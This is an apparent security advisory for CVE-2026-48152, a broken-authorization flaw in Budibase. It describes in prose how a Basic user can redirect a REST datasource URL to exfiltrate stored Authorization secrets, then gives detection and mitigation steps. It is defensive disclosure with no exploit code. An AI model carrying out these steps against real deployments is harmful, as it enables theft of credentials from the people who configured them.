CVE-2026-48152 Overview
CVE-2026-48152 is a broken authorization vulnerability [CWE-863] in Budibase, an open-source low-code platform. Versions prior to 3.39.0 expose single-datasource GET and PUT routes behind a generic TABLE READ permission instead of Builder/Admin checks or datasource-specific ownership validation. The built-in Basic app user role grants the WRITE permission set, allowing low-privileged users to read REST datasources, replace the config.url field, and trigger saved queries. The platform then re-attaches the original stored Authorization headers and sends them to the attacker-controlled host. The result is server-side disclosure of builder-configured REST authentication secrets.
Critical Impact
A Basic Budibase user can exfiltrate REST datasource Authorization secrets to an attacker-controlled listener by altering only the config.url value.
Affected Products
- Budibase versions prior to 3.39.0
- Self-hosted Budibase deployments exposing REST datasources
- Budibase apps configured with the built-in Basic role
Discovery Timeline
- 2026-05-27 - CVE-2026-48152 published to NVD
- 2026-05-27 - Last updated in NVD database
Technical Details for CVE-2026-48152
Vulnerability Analysis
The vulnerability stems from inconsistent authorization on the single-datasource GET and PUT API routes. Both endpoints rely on the generic TABLE READ permission rather than verifying Builder or Admin role membership. The Basic app user role maps to the WRITE permission set, which includes table read/write and query write. A Basic user therefore has sufficient privileges to manipulate datasource configuration objects that should be restricted to Builders.
During datasource retrieval, Budibase returns authConfigs values with sensitive fields redacted using placeholder tokens. On update, the mergeConfigs() function inspects each incoming field and restores the previously stored secret whenever it encounters a redaction placeholder. This merge logic preserves secrets across legitimate edits but introduces a critical asymmetry when combined with weak authorization on the PUT route.
Root Cause
The root cause is broken access control [CWE-863]. The datasource mutation route does not enforce ownership or Builder-level role checks. It accepts a partial datasource payload from any user holding WRITE, lets mergeConfigs() rehydrate redacted secrets, and persists the result. The same flaw allows the attacker to leave authentication metadata intact while pointing config.url at an external host.
Attack Vector
An authenticated Basic user issues a GET on the target REST datasource to obtain its structure and redacted authConfigs. The attacker submits a PUT changing only config.url to a controlled listener while keeping the redaction placeholders unchanged. The user then executes an existing saved relative-path REST query. Budibase concatenates the attacker-supplied base URL with the saved relative path and applies the resolved stored Authorization headers. The configured secret is sent in cleartext to the attacker endpoint.
No synthetic exploitation code is published here. See the GitHub Security Advisory GHSA-3gp5-q4jw-3v94 for the maintainer's technical write-up.
Detection Methods for CVE-2026-48152
Indicators of Compromise
- PUT requests to /api/datasources/:id originating from non-Builder accounts
- Datasource records whose config.url host differs from historical values or points to unfamiliar domains
- Outbound HTTP requests from Budibase backend processes to external hosts not used by legitimate integrations
- REST query executions immediately following a datasource update by a Basic user
Detection Strategies
- Audit application logs for datasource mutations performed by users without the Builder or Admin role
- Correlate datasource.update events with subsequent query.execute events from the same session
- Monitor egress traffic from the Budibase server for connections to newly observed domains carrying Authorization headers
- Compare current datasource config.url values against a known-good baseline configuration
Monitoring Recommendations
- Forward Budibase audit and HTTP logs to a centralized analytics platform such as Singularity Data Lake for OCSF-normalized correlation across identity, application, and network events
- Alert on any modification of REST datasource fields by accounts assigned the Basic role
- Track Budibase server outbound DNS resolutions and flag low-reputation destinations
How to Mitigate CVE-2026-48152
Immediate Actions Required
- Upgrade Budibase to version 3.39.0 or later on all self-hosted and managed deployments
- Rotate every secret previously stored in REST datasource authConfigs, including API keys, bearer tokens, and Basic auth credentials
- Review user role assignments and revoke Basic role privileges from accounts that do not require app interaction
- Inspect datasource configuration history for unauthorized config.url changes prior to patching
Patch Information
The vulnerability is fixed in Budibase 3.39.0. The patch tightens authorization on the single-datasource GET and PUT routes to require Builder/Admin permissions and adds datasource-specific resource checks. Refer to the Budibase GitHub Security Advisory for upgrade instructions and the official changelog.
Workarounds
- Restrict REST datasource creation to Builder accounts and remove unused REST datasources until upgraded
- Place the Budibase backend behind an egress proxy that allow-lists known integration endpoints
- Temporarily remove the Basic role from end users and require explicit per-app role provisioning
# Verify installed Budibase version and upgrade via Docker
docker inspect budibase/budibase --format '{{.Config.Labels.version}}'
docker pull budibase/budibase:3.39.0
docker compose -f /opt/budibase/docker-compose.yaml up -d
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
